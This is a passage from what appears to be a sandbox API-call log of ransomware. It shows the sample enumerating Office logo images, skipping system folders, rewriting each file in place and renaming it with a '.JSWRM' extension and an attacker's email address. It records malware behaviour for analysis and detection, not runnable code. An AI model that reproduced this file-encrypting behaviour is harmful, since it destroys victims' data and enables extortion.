(lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0132.448] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned -1 [0132.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0132.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22ce70, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0132.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0132.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0132.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.449] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1622) returned 1 [0132.449] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.449] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x650, lpOverlapped=0x0) returned 1 [0132.451] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.451] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x650, lpOverlapped=0x0) returned 1 [0132.451] CloseHandle (hObject=0x238) returned 1 [0132.451] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.452] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198fbe19, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x725, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.contrast-white_scale-100.png", cAlternateFileName="EX82AE~1.PNG")) returned 1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0132.452] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned -1 [0132.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0132.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0132.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.453] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1829) returned 1 [0132.453] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.454] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x720, lpOverlapped=0x0) returned 1 [0132.455] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.455] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x720, lpOverlapped=0x0) returned 1 [0132.455] CloseHandle (hObject=0x238) returned 1 [0132.455] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.456] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198d5bc7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x81c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.contrast-white_scale-140.png", cAlternateFileName="EXB07C~1.PNG")) returned 1 [0132.456] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0132.456] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0132.456] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0132.456] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0132.457] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0132.457] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0132.457] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0132.457] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.457] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0132.457] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned -1 [0132.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0132.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0132.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.458] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2076) returned 1 [0132.458] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.458] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x810, lpOverlapped=0x0) returned 1 [0132.460] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.460] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x810, lpOverlapped=0x0) returned 1 [0132.460] CloseHandle (hObject=0x238) returned 1 [0132.460] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.461] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198d5bc7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa0a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.contrast-white_scale-180.png", cAlternateFileName="EX0EF0~1.PNG")) returned 1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0132.461] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned -1 [0132.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0132.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0132.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.462] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2570) returned 1 [0132.462] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.462] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa00, lpOverlapped=0x0) returned 1 [0132.464] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.464] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa00, lpOverlapped=0x0) returned 1 [0132.464] CloseHandle (hObject=0x238) returned 1 [0132.464] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.465] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198d5bc7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.contrast-white_scale-80.png", cAlternateFileName="EX8CE6~1.PNG")) returned 1 [0132.465] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0132.465] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0132.465] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0132.465] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0132.465] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0132.465] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0132.465] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0132.465] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.466] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0132.466] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned -1 [0132.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0132.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0132.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0132.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22d298, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0132.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.466] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1612) returned 1 [0132.467] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.467] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x640, lpOverlapped=0x0) returned 1 [0132.480] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.480] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x640, lpOverlapped=0x0) returned 1 [0132.481] CloseHandle (hObject=0x238) returned 1 [0132.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft 